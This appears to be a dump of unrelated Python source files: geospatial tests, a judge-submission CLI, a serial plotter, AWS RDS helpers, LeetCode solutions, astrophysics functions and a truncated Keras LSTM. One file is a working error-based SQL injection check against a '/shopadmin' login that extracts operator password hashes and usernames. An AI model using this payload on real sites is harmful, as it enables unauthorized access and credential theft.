Tests agiovanni.intersect code.
'''
__author__ = 'Christine Smit <christine.e.smit@nasa.gov>'
import unittest
import os
import agiovanni.intersect as intersect
class Test(unittest.TestCase):
    """Tests the intersection code."""

    def setUp(self):
        # Fixture shapefiles and masks live in test_intersect/ next to this file.
        test_dir = os.path.dirname(__file__)
        self.test_file_dir = os.path.join(test_dir, 'test_intersect')

    def testEsriShapefile(self):
        """Bounding-box vs. shape intersection against ESRI shapefiles,
        including boxes that straddle the 180-degree meridian."""
        us_states = os.path.join(self.test_file_dir, 'tl_2014_us_state.shp')
        countries = os.path.join(self.test_file_dir, 'state_dept_countries.shp')
        # NOTE: Maryland is shp_4
        self.assertTrue(
            intersect.intersects("-180,-90,180,90", us_states, 'shp_4'),
            "Maryland shape intersects with the entire globe")
        self.assertTrue(
            intersect.intersects(
                "-76.5527, 39.0271, -75.1025, 40.2356",
                us_states,
                'shp_4'),
            "Maryland shape intersects with smaller bounding box")
        self.assertFalse(
            intersect.intersects(
                "-129.375, 24.7266, -68.9062, 57.0703",
                countries,
                'shp_162'),
            "Nigeria shape does not intersect with bounding box over United States")
        self.assertFalse(
            intersect.intersects(
                "-78.9258, 38.4558, -77.915, 39.2029",
                us_states,
                'shp_4'),
            "Maryland shape does not intersect with bounding box in Virginia")
        self.assertFalse(
            intersect.intersects(
                "-77, 39, -77, 39",
                us_states,
                'shp_4'),
            "Points don't intersect with shapes.")
        # NOTE: Alaska is shp_40
        self.assertTrue(
            intersect.intersects(
                "172.8369, 50.5005, -179.6045, 53.8403",
                us_states,
                'shp_40'),
            "Alaska intersects with bounding box over 180 meridian")
        self.assertTrue(
            intersect.intersects(
                "164.6631, 50.5518, -167.0361, 56.792",
                us_states,
                'shp_40'),
            "Alaska intersects with bounding box over 180 meridian")
        self.assertFalse(
            intersect.intersects(
                "168.6182, 11.3086, -168.8818, 33.8086",
                us_states,
                'shp_40'),
            "Alaska does not intersect with this bounding box over 180 meridian")
        self.assertFalse(
            intersect.intersects(
                "176.5283, 53.9282, -175.8691, 57.2681",
                us_states,
                'shp_40'),
            "Alaska does not intersect with this bounding box over 180 meridian")

    def testMaskShape(self):
        """Bounding-box intersection against a netCDF land/sea mask (no
        shape id argument): true where the mask has positive values."""
        gpm = os.path.join(self.test_file_dir, "gpmLandSeaMask.nc")
        self.assertTrue(
            intersect.intersects(
                "-180,-90,180,90",
                gpm),
            "GPM land sea mask has positive values somewhere on the planet")
        self.assertTrue(
            intersect.intersects(
                "-54.1406, -28.7109, -30.9375, -4.8047",
                gpm),
            "GPM land sea mask has positive values off Brazil coast")
        self.assertFalse(
            intersect.intersects(
                "18.9404, -33.4351, 23.2031, -29.7876",
                gpm),
            "GPM land sea mask has no positive values in the middle of South Africa")
        self.assertFalse(
            intersect.intersects(
                "179.2969, 66.98, -179.2969, 68.1665",
                gpm),
            "GPM land sea mask has no positive values in Russia over 180 meridian")
        self.assertTrue(
            intersect.intersects(
                "171.5625, 26.0742, -173.6719, 35.5664",
                gpm),
            "GPM land sea mask is all zero over 180 meridian in the Pacific")
        self.assertFalse(
            intersect.intersects(
                "0.0,0.0,0.0,0.0",
                gpm),
            "Points don't intersect")
# Allow running this test module directly with the standard unittest runner.
if __name__ == "__main__":
    unittest.main()
|
990,911 | 9c9569c2a37690741b47abd8e1f22465903664f7 | import os
import os.path
from argparse import ArgumentParser
from functools import wraps
import logging
# Route warnings.warn() output through logging and configure the root logger
# ('' name) so every module in the package inherits this stream handler.
logging.captureWarnings(True)
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
# Only the bare message is printed; datefmt would matter only if fmt
# contained %(asctime)s.
formatter = logging.Formatter(fmt='%(message)s',datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
from . import (
compile_solution, run_file, run_test,
find_solutions, find_testcases,
generate_submission, submit_solution,
clean_generated_files
)
from .clients import ClientLoader
def argument(*args, **kwargs):
    """Defer an ``add_argument`` call so it can be replayed on a subparser."""
    def register(parser):
        return parser.add_argument(*args, **kwargs)
    return register
class Command(object):
    """Registry of subcommands built on top of argparse subparsers."""

    def __init__(self, parser):
        self._parser = parser
        self._subparsers = parser.add_subparsers(dest="COMMAND")
        self._commands = {}

    def __call__(self, *arguments):
        """Decorator factory: register the decorated function as a subcommand.

        Each item of ``arguments`` is a callable that adds one argument to
        the freshly created subparser; the wrapper forwards only the options
        the user actually supplied (non-None) as keyword arguments.
        """
        def decorator(func):
            name = func.__name__.replace("_", "-")
            subparser = self._subparsers.add_parser(name, help = func.__doc__)
            dests = [register(subparser).dest for register in arguments]

            @wraps(func)
            def wrapper(cfg, args):
                supplied = {dest: getattr(args, dest)
                            for dest in dests
                            if getattr(args, dest) is not None}
                return func(cfg, **supplied)

            self._commands[name] = wrapper
            return wrapper
        return decorator

    def parse(self):
        """Parse argv and return the (handler, parsed-args) pair; an absent
        command falls back to the "help" handler."""
        args = self._parser.parse_args()
        return self._commands[args.COMMAND or "help"], args
# Root command-line parser: global flags live here, subcommands are added
# through the Command decorator below.
parser = ArgumentParser(description="IX")
parser.add_argument("-k","--keep-going",action="store_true",default=False,help="keep going when some task failed")
parser.add_argument("-v","--verbose",action="store_true",default=False,help="show verbose outputs")
parser.add_argument("--no-ask",action="store_true",default=False,help="do not ask for password")
parser.add_argument("-c","--config",metavar="CFG",help="use config file at CFG")
command = Command(parser)
@command(
    argument("-r", "--recompile", action="store_true", help="recompile if already compiled before run"),
    argument("filename", help="path to solution"))
def run(cfg, filename, recompile=False):
    """run solution"""
    # Generator protocol: the driver in main() sends each yielded step's
    # result back in; a None result marks the step as failed.
    target = yield compile_solution(cfg, filename, recompile)
    if target is None:
        return
    yield run_file(cfg, target)
@command(
    argument("-r", "--recompile", action="store_true", help="recompile if already compiled before test"),
    argument("filename", nargs='?', help="path to solution"))
def test(cfg, filename=None, recompile=False):
    """check solution against sample testcases"""
    # For every matching solution: compile it, look up its testcases, and
    # run each (input, expected-output) pair.  Failed steps yield None and
    # are skipped rather than aborting the whole sweep.
    for filename, (oj, problem) in find_solutions(cfg, filename):
        target = yield compile_solution(cfg, filename, recompile)
        if target is None:
            continue
        testcases = yield find_testcases(cfg, oj, problem)
        if testcases is None:
            continue
        for input, output in testcases:
            yield run_test(cfg, target, input, output)
@command(
    argument("filename", nargs='?', help="path to solution"))
def generate(cfg, filename=None, wait=False):
    """print the code to be submitted"""
    # NOTE(review): ``wait`` is never supplied by the argument list above and
    # is unused here -- looks copied from submit(); confirm before removing.
    code = yield generate_submission(cfg, filename)
    print(code)
@command(
    argument("-w","--wait",action="store_true",default=False, help="wait until verdict"),
    argument("filename", nargs='?', help="path to solution"))
def submit(cfg, filename=None, wait=False):
    """submit solution"""
    # Submit every matching solution; with --wait each submission blocks
    # until the judge returns a verdict.
    for filename, (oj, problem) in find_solutions(cfg, filename):
        yield submit_solution(cfg, oj, problem, filename, wait)
@command(
    argument("filename", nargs='?', help="path to solution"))
def clean(cfg, filename=None, wait=False):
    """removes generated files"""
    # NOTE(review): ``wait`` is unused and has no matching argument -- looks
    # copied from submit(); confirm before removing.
    for filename, (oj, problem) in find_solutions(cfg, filename):
        yield clean_generated_files(cfg, filename)
@command()
def help(cfg):
    """Print help message"""
    # Fallback handler used by Command.parse() when no subcommand is given.
    parser.print_help()
def main(cmd, args, cfg):
    """Drive a command handler: push global flags into ``cfg``, feed each
    step's result back into the generator, and exit non-zero on failure."""
    if args.no_ask:
        cfg.NO_ASK = True
    if args.verbose:
        cfg.VERBOSE = True
    handler.setLevel(logging.DEBUG if cfg.VERBOSE else logging.INFO)
    keep_going = args.keep_going
    error_occured = False
    cfg.client_loader = ClientLoader(cfg)
    g = cmd(cfg,args)
    # Non-generator commands (e.g. help) return None and are already done.
    if g is None:
        return
    result = None
    while True:
        try:
            result = g.send(result)
        except StopIteration:
            break
        # A step that yields None counts as a failure; -k/--keep-going
        # continues with the remaining steps anyway.
        if result is None:
            error_occured = True
            if not keep_going:
                break
    if error_occured:
        exit(1)
    exit(0)
|
990,912 | 33132db9d4a1ef593cac30ef8bd22b2b816ac700 | from ctypes import *
# Attach to a Windows process as a debugger and immediately detach again.
# Fixed: the original mixed Python 2 print statements with Python 3 calls,
# which is a SyntaxError on Python 3; also renamed the misspelt ``kerne32``.
kernel32 = windll.kernel32
pid = int(input("pid : "))
if kernel32.DebugActiveProcess(pid):
    print("attached:", pid)
    kernel32.DebugActiveProcessStop(pid)
    print("detached:", pid)
else:
    # Attach failed: surface the Win32 error for diagnosis.
    print("error:", pid)
    print(WinError(GetLastError()))
|
990,913 | ca59749828a646627f74f031ef57203f51875721 | from .cart import Cart
# Makes the cart available to all templates in the project
def cart(request):
    """Context processor exposing the session Cart as ``cart`` to templates."""
    return {'cart': Cart(request)}
|
990,914 | 47ac53fccf19a2067f50c18bd9306d8297d2280f | """cinema pricing"""
def main():
    """Read a weekday and a person count from stdin and print the total
    ticket price (120/80/140 per person depending on the day)."""
    date = input().lower()
    pers = int(input())
    # Fixed: membership must be tested against a tuple of day names.  The
    # original ``date in "monday tuesday"`` was a substring check, so inputs
    # like "day t" or "on" were priced as Monday/Tuesday.
    if date in ("monday", "tuesday"):
        print(pers * 120)
    elif date == "wednesday":
        print(pers * 80)
    elif date in ("thursday", "friday", "saturday", "sunday"):
        print(pers * 140)
    # Unknown day names print nothing, matching the original behaviour.
main()
|
990,915 | 79c7d0a9f30607d11cb2fa91a2fd8bb37daaeb5b | errorCodeMessage = {}
errorCodeMessage[1062] = 'Borrower already exists' |
990,916 | e17198bb8c95397b4a8c6dc74072159b0c422c85 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt  # plt is used to display the image
import matplotlib.image as mpimg  # mpimg is used to read the image
import numpy as np
lena = mpimg.imread('C:/Users/Administrator/Documents/test.jpg')  # read the image from an absolute Windows path
# At this point ``lena`` is already a np.array and can be processed freely.
plt.imshow(lena)  # show the image
plt.axis('off')  # hide the axes
plt.show() |
990,917 | 52069ab12d33a1915d703a3745a03daf5ab01132 | import serial
from collections import deque
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
import tkinter as Tk
from tkinter.ttk import Frame
from itertools import count
import random
class serialPlot:
    """Thin wrapper around a pyserial connection that parses one line of
    whitespace-separated floats at a time."""

    def __init__(self, puerto, baudios, longitud_grafico):
        self.port = puerto
        self.baud = baudios
        self.plotMaxLength = longitud_grafico
        print('Intentando conectar a: ' + str(puerto) + ' a ' + str(baudios) + ' BAUD.')
        try:
            self.serialConnection = serial.Serial(puerto, baudios, timeout=4)
            print('Conectado a: ' + str(puerto) + ' a ' + str(baudios) + ' BAUD.')
        except Exception:
            # Fixed: narrowed from a bare ``except:``, which would also have
            # swallowed KeyboardInterrupt/SystemExit.  NOTE(review): on
            # failure ``self.serialConnection`` stays unset, so a later read
            # raises AttributeError -- kept to preserve original behaviour.
            print("Falla al conectar a: " + str(puerto) + ' a ' + str(baudios) + ' BAUD.')

    def leer_serial(self):
        """Read one line from the serial port and return its whitespace
        separated fields as a list of floats."""
        linea = self.serialConnection.readline()
        data = [float(val) for val in linea.split()]
        return data
class Window(Frame):
    """Tk frame that embeds the live matplotlib figure and its widgets."""

    def __init__(self, figure, master, obj_serialPlot, maxPlotLength):
        Frame.__init__(self, master)
        self.master = master  # root window
        self.serial_plot = obj_serialPlot  # serialPlot object used as the data source
        self.initWindow(figure)  # build the widgets
        self.contador = count()
        self.maxLen = maxPlotLength
        # Pre-filled ring buffers for the two plotted channels.
        self.y1_vals = deque([0.0]*self.maxLen, maxlen=self.maxLen)
        self.y2_vals = deque([0.0]*self.maxLen, maxlen=self.maxLen)

    def initWindow(self, figure):
        """Create the canvas, toolbar and control widgets on the root window."""
        self.master.title("Grafico en tiempo real")
        canvas = FigureCanvasTkAgg(figure, master=self.master)
        toolbar = NavigationToolbar2Tk(canvas, self.master)
        canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)
        # Widgets placed directly on the root window.
        lbl1 = Tk.Label(self.master, text="Esto es un label")
        lbl1.pack(padx=5, pady=5)
        self.entry = Tk.Entry(self.master)  # text entry box
        self.entry.insert(0, '1.0')  # (index, string)
        self.entry.pack(padx=5)
        SendButton = Tk.Button(self.master, text='Send', command=self.funcionBoton)  # button wired to funcionBoton
        SendButton.pack(padx=5)

    def funcionBoton(self):
        # Debug helper: print one parsed line from the serial port.
        print(self.serial_plot.leer_serial())

    def graficar(self, frameNum, linea1,linea2):
        """FuncAnimation callback: read one sample and update both lines."""
        buffer = self.serial_plot.leer_serial()  # parsed list of floats
        # NOTE(review): the deques are created already holding maxLen zeros,
        # so len() == maxLen from the start and only the appendleft branch
        # ever runs -- confirm whether append was intended.
        if len(self.y1_vals) < self.maxLen:
            self.y1_vals.append(buffer[0])
            self.y2_vals.append(buffer[1])
        else:
            self.y1_vals.appendleft(buffer[0])
            self.y2_vals.appendleft(buffer[1])
        linea1.set_data(range(self.maxLen), self.y1_vals)
        linea2.set_data(range(self.maxLen), self.y2_vals)
        return linea1,linea2
def main():
    """Open the serial port, build the figure and the Tk GUI, then start
    the animation loop."""
    # Serial port parameters
    portName = 'COM13'
    baudRate = 9600
    maxPlotLength = 100  # number of points in x-axis of real time plot
    arduino = serialPlot(portName, baudRate, maxPlotLength)
    # Plot parameters; the y-limits get a 10% margin on each side.
    xmin = 0
    xmax = maxPlotLength
    ymin = -(1)
    ymax = 100
    fig = plt.figure(figsize=(4, 4))
    ax = plt.axes(xlim=(xmin, xmax), ylim=(float(ymin - (ymax - ymin) / 10), float(ymax + (ymax - ymin) / 10)))
    ax.set_title('Arduino data')
    ax.set_xlabel("Time")
    ax.set_ylabel("Humedad relativa")
    linea1, = ax.plot([], [])
    linea2, = ax.plot([], [])
    # Tkinter's GUI
    root = Tk.Tk()
    app = Window(fig, root, arduino, maxPlotLength)
    # Keep a reference to the animation so it is not garbage collected.
    anim = animation.FuncAnimation(fig, app.graficar, fargs=(linea1, linea2), interval=2, blit=True)
    root.mainloop()
if __name__ == '__main__':
main() |
990,918 | 6264f726f1d6df6e086e12b713e7d5f39016a02f | import json
import urllib3
# Target endpoint of the task service.
post_url = "http://0.0.0.0:8383/add_task/"
data = {
    "id": "2",
    "info": "第二",
}
# The service expects a UTF-8 encoded JSON body.
encoded_data = json.dumps(data).encode("utf-8")
http = urllib3.PoolManager()
r = http.request(
    "POST",
    post_url,
    body=encoded_data,
    headers={
        'content-type': 'application/json;charset=UTF-8'
    }
)
# On success, decode and print the JSON response (if any).
if r.status == 200:
    response = r.data
    if len(response) > 0:
        j = json.loads(response)
        print(j)
|
990,919 | 7392d0c0d1c7c281ea0bd766a2589006a0a77a6a | # -*- coding: utf-8 -*-
"""
.. codeauthor:: Daniel Seichter <daniel.seichter@tu-ilmenau.de>
"""
class SceneNetRGBDBase:
    """Constants describing the SceneNet RGB-D dataset layout and labels."""

    # Available dataset splits.
    SPLITS = ['train', 'valid']
    # number of classes without void (NYUv2 classes)
    N_CLASSES = 13
    # Index 0 is 'void'; the remaining 13 entries are the NYUv2 classes.
    CLASS_NAMES = ['void',
                   'bed',
                   'books',
                   'ceiling',
                   'chair',
                   'floor',
                   'furniture',
                   'objects',
                   'picture',
                   'sofa',
                   'table',
                   'tv',
                   'wall',
                   'window']
    # One RGB colour per entry of CLASS_NAMES, in the same order.
    CLASS_COLORS = [[0, 0, 0],
                    [0, 0, 255],
                    [232, 88, 47],
                    [0, 217, 0],
                    [148, 0, 240],
                    [222, 241, 23],
                    [255, 205, 205],
                    [0, 223, 228],
                    [106, 135, 204],
                    [116, 28, 41],
                    [240, 35, 235],
                    [0, 166, 156],
                    [249, 139, 0],
                    [225, 228, 194]]
    # Sub-directory names for each modality inside a dataset sample.
    DEPTH_DIR = 'depth'
    RGB_DIR = 'rgb'
    LABELS_13_DIR = 'labels_13'
    LABELS_13_COLORED_DIR = 'labels_13_colored'
|
990,920 | 3092d98465392f5aacb9ce2fae6e4bda0705188b | #problem 541 / reverse string II
#Note on string indices: the slice s[i:j] includes s[i] but excludes s[j]
class Solution(object):
    def reverseStr(self, s, k):
        """
        Reverse the first k characters of every 2k-character chunk of s;
        a final chunk shorter than k is reversed entirely.

        :type s: str
        :type k: int
        :rtype: str
        """
        chars = list(s)
        # Walk the string in 2k strides; slicing past the end is safe.
        for start in range(0, len(chars), 2 * k):
            chars[start:start + k] = reversed(chars[start:start + k])
        return "".join(chars)
990,921 | 9aca86a921232775b753673a175b23a72544ee0a | import boto3
class RdsNotReadyError(Exception):
    """Raised when the RDS instance is not yet in the 'available' state."""
    pass
def create_instance(db_instance, engine):
    """Create a new RDS instance for this DB instance.

    :param aws_db_addons.models.DbInstance db_instance:
    :param str engine:
    :raises botocore.exceptions.ClientError:
    """
    rds = boto3.client('rds')
    # Smallest/cheapest footprint: 5 GB of gp2 storage on a db.t2.micro.
    rds.create_db_instance(
        DBInstanceIdentifier=db_instance.aws_instance_identifier,
        AllocatedStorage=5,
        DBName=db_instance.db_name,
        Engine=engine,
        # General purpose SSD
        StorageType='gp2',
        # can't encrypt t2
        # StorageEncrypted=True,
        AutoMinorVersionUpgrade=True,
        # TODO Set this to true?
        MultiAZ=False,
        MasterUsername=db_instance.master_username,
        MasterUserPassword=db_instance.master_password,
        PubliclyAccessible=True,
        DBInstanceClass='db.t2.micro')
def get_endpoint(db_instance):
    """Get the endpoint for this DB instance. Raises RdsNotReadyError if
    the instance is not ready.

    :param aws_db_addons.models.DbInstance db_instance:
    :rtype: str
    :returns: The endpoint (e.g. 'localhost:1234')
    :raises botocore.exceptions.ClientError:
        when there is a client error, including if the instance is not found
    :raises RdsNotReadyError:
    """
    client = boto3.client('rds')
    described = client.describe_db_instances(
        DBInstanceIdentifier=db_instance.aws_instance_identifier)
    matching = described['DBInstances']
    # The identifier is unique, so exactly one instance must come back.
    assert len(matching) == 1
    instance = matching[0]
    status = instance['DBInstanceStatus']
    if status != 'available':
        raise RdsNotReadyError('RDS instance {} is not in the "available" state. The state is "{}".'.format(
            db_instance.aws_instance_identifier, status))
    endpoint = instance['Endpoint']
    return '{host}:{port}'.format(
        host=endpoint['Address'],
        port=endpoint['Port']
    )
def delete_instance(db_instance):
    """Delete the RDS instance corresponding to this DB instance.

    :type db_instance: aws_db_addons.models.DbInstance
    :raises botocore.exceptions.ClientError:
    """
    client = boto3.client('rds')
    # No final snapshot is kept -- the data is gone once this returns.
    client.delete_db_instance(
        SkipFinalSnapshot=True,
        DBInstanceIdentifier=db_instance.aws_instance_identifier)
|
990,922 | 08ea73f9f61b139c7bb33aba207f1a666cf23815 | """
Given a m * n matrix grid which is sorted in non-increasing order both row-wise and column-wise.
Return the number of negative numbers in grid.
"""
class Solution(object):
    def countNegatives(self, grid):
        """Count negative entries in a matrix whose rows and columns are
        sorted in non-increasing order."""
        def negatives_in(row):
            # Binary search for the first negative; everything after it is
            # negative too because the row is non-increasing.
            lo, hi = 0, len(row)
            while lo < hi:
                mid = (lo + hi) // 2
                if row[mid] < 0:
                    hi = mid
                else:
                    lo = mid + 1
            return len(row) - lo
        return sum(negatives_in(row) for row in grid)
# Smoke-test the solution on the two LeetCode examples.
for matrix, expected in (
    ([[4, 3, 2, -1],
      [3, 2, 1, -1],
      [1, 1, -1, -2],
      [-1, -1, -2, -3]], 8),
    ([[3, 2], [1, 0]], 0),
):
    got = Solution().countNegatives(matrix)
    assert got == expected, got
|
990,923 | 84ca6ffd7994517b9735b1b6b3844aa37c67c2c6 | class Solution(object):
def searchRange_lowerandupperboundbinarysearch(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
# lower
l, r = 0, len(nums)-1
while l <= r:
m = (l+r) // 2
if nums[m] < target:
l = m + 1
else:
r = m - 1
if l == len(nums) or nums[l] != target:
return [-1,-1]
retl = l
l, r = 0, len(nums)-1
while l <= r:
m = (l+r) // 2
if nums[m] <= target:
l = m + 1
else:
r = m - 1
retr = r
return [retl, retr]
    def searchRange_myself(self, nums, target):
        """
        Find the first/last index of target via a plain binary search plus
        repeated re-searches toward each end.

        :type nums: List[int]
        :type target: int
        :rtype: List[int]
        """
        def bs(nums, target, l, r):
            # Recursive binary search over the inclusive range [l, r];
            # returns the index of *some* occurrence of target, or -1.
            # l and r are included.
            if l <= r:
                m = (l+r) // 2
                if nums[m] == target:
                    return m
                elif nums[m] < target:
                    return bs(nums, target, m+1, r)
                else:
                    return bs(nums, target, l, m-1)
            else:
                return -1
        pivot = bs(nums, target, 0, len(nums)-1)
        if pivot == -1:
            return [-1, -1]
        left = right = pivot
        # Walk outwards: while another occurrence exists strictly left/right
        # of the current bound, re-search that side and tighten the bound.
        while bs(nums, target, 0, left-1) != -1:
            left = bs(nums, target, 0, left)
        while bs(nums, target, right+1, len(nums)-1) != -1:
            right = bs(nums, target, right+1, len(nums)-1)
        return [left, right]
|
990,924 | 2688699cbfdaf393344e67397a13261f9ad5ae79 | import pandas as pd
import matplotlib.pyplot as plt
import os
import tempfile
# Scatter plot of lecturer salaries vs. experience, read from a CSV placed
# in the system temp directory.
tempdir = tempfile.gettempdir()
tempfolder = os.path.join(tempdir, 'dataframe')
filename = os.path.join(tempfolder, 'salary.csv')
try:
    salary = pd.read_csv(filename)
except Exception:
    # Fixed: the bare ``except`` printed a message and fell through, after
    # which the script crashed anyway with NameError because ``salary`` was
    # never bound.  Stop with the same message instead.
    raise SystemExit('Fail to read from source file')
plt.figure(figsize=(6, 5))
# Marker encodes the management flag, colour encodes the education level.
symbol_manag = dict(Y='*', N='.')
colors_edu = {'Bachelor': 'r', 'Master': 'g', 'Ph.D': 'b'}
for values, d in salary.groupby(['education', 'management']):
    edu, manager = values
    plt.scatter(d['experience'], d['salary'], marker=symbol_manag[manager],
                color=colors_edu[edu], s=150, label=manager + '/' + edu)
plt.xlabel('Experience')
plt.ylabel('Salary')
plt.title('A graph of lecturers salaries against experience')
plt.legend(loc=4)
plt.savefig('scatter.svg')
plt.show()
|
990,925 | 98d944295bee89b3298f9fd8edb2cdc3ba5bf797 | class Solution(object):
def trimMean(self, arr):
"""
:type arr: List[int]
:rtype: float
"""
arr.sort()
five = int((len(arr) * 0.05))
arr = arr[five:-five]
if len(arr) == 0:
return 0
return sum(arr) / len(arr)
if __name__ == '__main__':
    # Print the trimmed mean for the two LeetCode sample inputs.
    for sample in (
        [1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,3],
        [6,0,7,0,7,5,7,8,3,4,0,7,8,1,6,8,1,1,2,4,8,1,9,5,4,3,8,5,10,8,6,6,1,0,6,10,8,2,3,4],
    ):
        print(Solution().trimMean(sample))
|
990,926 | 57b750fe51b7da7fea9316feda177aee727c2cd3 | #!/usr/bin/python
# -*- coding:utf-8
import re,sys
sys.path.append('..')
from expFunc import *
# Proof-of-concept check for an error-based SQL injection in the shopadmin
# login, using the classic floor(rand(0))/group-by duplicate-key technique.
url=sys.argv[1]
payload ="\"/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0\")*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1"
# MySQL error fragment whose presence in the response indicates the
# injection fired.
bug ="Duplicate entry"
info = "/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0"
def main():
    # Fetch the login URL with the payload appended and report the target
    # as vulnerable when the duplicate-entry error leaks through.
    res = HttpGet(url+payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
    if res[0].find(bug)!= -1:
        print(Result+url+info);
main()
|
990,927 | ca23d027d787d1fa4cc50e2aa3541e0032ee48ab | import numpy as np
import mpmath
# import COLD GASS functions
import models
def log_schechter_true(logL, log_phi, log_L0, alpha):
    """Schechter function evaluated in log-luminosity space (per dex)."""
    delta = logL - log_L0          # offset from the knee, in dex
    lum_ratio = np.power(10, delta)  # L / L0
    return np.log(10) * log_phi * lum_ratio ** (alpha + 1) * np.exp(-lum_ratio)
def double_schechter(M, gsmf_params):
    """Double Schechter mass function in log-mass space (per dex)."""
    Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
    ratio = np.power(10, M - Mstar)  # M / M* in linear units
    powerlaws = phistar1 * ratio ** (alpha1 + 1) + phistar2 * ratio ** (alpha2 + 1)
    return np.log(10) * np.exp(-ratio) * powerlaws
def single_schechter_analytic(M, gsmf_params):
    # Integrated (cumulative) single Schechter function via the upper
    # incomplete gamma function.
    # NOTE(review): M is used linearly here (divided by 10**Mstar), unlike
    # the log-space functions above -- confirm callers pass a linear mass.
    # phistar1 and alpha1 are unpacked but unused in this variant.
    Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
    Mstar2 = np.power(10,Mstar)
    phi_Mstar_single = phistar2*mpmath.gammainc(alpha2+1, M/Mstar2)
    # mpmath returns an mpf; round-trip through str to obtain a float.
    return float(str(phi_Mstar_single))
def double_schechter_analytic(M, gsmf_params):
    # Integrated (cumulative) double Schechter function: sum of two upper
    # incomplete gamma terms sharing the same knee mass.
    # NOTE(review): as in single_schechter_analytic, M enters linearly here.
    Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
    Mstar2 = np.power(10,Mstar)
    phi_Mstar_double = phistar1*mpmath.gammainc(alpha1+1, M/Mstar2) + phistar2*mpmath.gammainc(alpha2+1, M/Mstar2)
    # mpmath returns an mpf; round-trip through str to obtain a float.
    return float(str(phi_Mstar_double))
def single_schechter(M, gsmf_params):
    """Single Schechter function (second component only) in log-mass space."""
    Mstar, _phistar1, phistar2, _alpha1, alpha2 = gsmf_params
    ratio = np.power(10, M - Mstar)
    return np.log(10) * np.exp(-ratio) * phistar2 * ratio ** (alpha2 + 1)
def single_schechter2(M, gsmf_params):
    """Single Schechter function with a three-element parameter tuple."""
    Mstar, phistar1, alpha1 = gsmf_params
    ratio = np.power(10, M - Mstar)
    return np.log(10) * np.exp(-ratio) * phistar1 * ratio ** (alpha1 + 1)
def single_schechter_linear(M, gsmf_params):
    """Single Schechter function (second component) in linear mass units."""
    Mstar, _phistar1, phistar2, _alpha1, alpha2 = gsmf_params
    Mstar_lin = np.power(10, Mstar)
    x = M / Mstar_lin
    # The trailing 1/Mstar_lin converts to a density per unit linear mass.
    return np.exp(-x) * phistar2 * np.power(x, alpha2) / Mstar_lin
def double_schechter_linear(M, gsmf_params):
    """Double Schechter function in linear mass units."""
    Mstar, phistar1, phistar2, alpha1, alpha2 = gsmf_params
    Mstar_lin = np.power(10, Mstar)
    x = M / Mstar_lin
    mixture = phistar1 * np.power(x, alpha1) + phistar2 * np.power(x, alpha2)
    # The trailing 1/Mstar_lin converts to a density per unit linear mass.
    return np.exp(-x) * mixture / Mstar_lin
def schechterL(luminosity, phiStar, alpha, LStar):
    """Schechter luminosity function in linear luminosity units."""
    x = luminosity / LStar
    return (phiStar / LStar) * np.power(x, alpha) * np.exp(-x)
def double_schechter_peak(M, M_peaked, gsmf_params, sigma):
    # Double Schechter amplitude evaluated at M_peaked, spread over M as a
    # Gaussian centred on M_peaked.
    # NOTE(review): the normalisation uses np.exp(sigma) as the width while
    # ``sigma`` itself is handed to models.Gaussian_Conditional_Probability
    # -- confirm which convention that helper expects.
    phi_Mstar_double = double_schechter(M_peaked, gsmf_params)
    # phi_Mstar_double = 0.1
    phi = phi_Mstar_double*np.sqrt(2*np.pi*np.exp(sigma)*np.exp(sigma))*models.Gaussian_Conditional_Probability(M, M_peaked, sigma)
    return phi
|
990,928 | 6b94e6acc2117e6cc393bcb3d72a62cb04bb1add | import keras
from keras.layers import LSTM
from keras.layers import Dense, Activation, Input, Dropout, Activation
from keras.datasets import mnist
from keras.models import Sequential, Model
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
# Hyper-parameters.
learning_rate = 0.001
training_iters = 3
batch_size = 128
display_step = 10
# Each 28x28 MNIST image is fed to the LSTM as a sequence of 28 rows of
# 28 pixels.
n_input = 28
n_step = 28
n_hidden = 128
n_classes = 10
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(-1, n_step, n_input)
x_test = x_test.reshape(-1, n_step, n_input)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
# Scale pixel values into [0, 1] and one-hot encode the labels.
x_train /= 255
x_test /= 255
y_train = keras.utils.to_categorical(y_train, n_classes)
y_test = keras.utils.to_categorical(y_test, n_classes)
# Model definition 1: sequential model (Sequential)
#model = Sequential()
#model.add(LSTM(n_hidden, batch_input_shape=(None, n_step, n_input), unroll=True))
#model.add(Dense(n_classes))
#model.add(Activation('softmax'))
# Model definition 2: functional model (Model); Sequential is a special
# case of Model.
#inputs = Input(shape=(n_step, n_input))
#x = LSTM(n_hidden, unroll=True)(inputs)
#predictions = Dense(n_classes, activation='softmax')(x)
#model = Model(inputs=inputs, outputs=predictions)
inputs = Input(shape=(n_step, n_input))
X = LSTM(n_hidden, return_sequences=True)(inputs)
X = Dropout(0.5)(X)
X = LSTM(128)(X)
X = Dropout(0.5)(X)
X = Dense(n_classes)(X)
predictions = Activation('softmax')(X)
model = Model(inputs=inputs, outputs=predictions)
# NOTE(review): newer Keras spells this Adam(learning_rate=...); ``lr`` is
# the legacy keyword.
adam = Adam(lr=learning_rate)
model.summary()
model.compile(optimizer=adam,
